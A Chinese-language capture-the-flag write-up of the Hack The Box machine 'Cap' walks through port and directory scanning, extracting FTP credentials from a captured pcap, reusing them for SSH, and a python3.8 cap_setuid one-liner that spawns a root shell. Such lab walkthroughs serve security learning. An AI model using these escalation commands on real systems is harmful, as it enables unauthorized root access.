阅读 104

machine-Cap-easy

信息收集

KALI NAMP扫描目标端口

nmap -T4 -vv -sV 10.10.10.245

gobuster扫描目录

gobuster dir -u http://10.10.10.245/ -w /usr/share/SecLists/Discovery/Web-Content/raft-small-words-lowercase.txt -t 50

需要用到的字典下载:

https://github.com/danielmiessler/SecLists

在 /data 目录中发现了很多文件。在点击并尝试目录中的每个文件后,发现了一个文件/data/0
下载数据包进行分析

分析pcap文件,可以发现目标登录ftp的账号以及密码

使用此账号尝试登录ftp以及ssh,发现此账号密码可以登录ssh:

提权

搜索sudo 权限、SUID二进制文件和可以通过为我们提供root shell来提升权限的功能。
尝试通过capabilities 提权。幸运的是,通过以下命令在目标机器上搜索,有cap_setuid可用(目标上的python3.8二进制文件)。

getcap -r / 2>/dev/null

2>/dev/null 是如果你的命令出错的话,错误报告直接就删除了。不会显示在屏幕上,或者是以邮件的形式发给你了。

python3.8 -c ‘import os; os.setuid(0); os.system("/bin/bash")‘

参考链接



原文:https://www.cnblogs.com/ctfisnull/p/15249610.html
文章分类
代码人生
文章标签
machine
cap
easy
版权声明:本站是系统测试站点,无实际运营。本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 XXXXXXo@163.com 举报,一经查实,本站将立刻删除。
相关推荐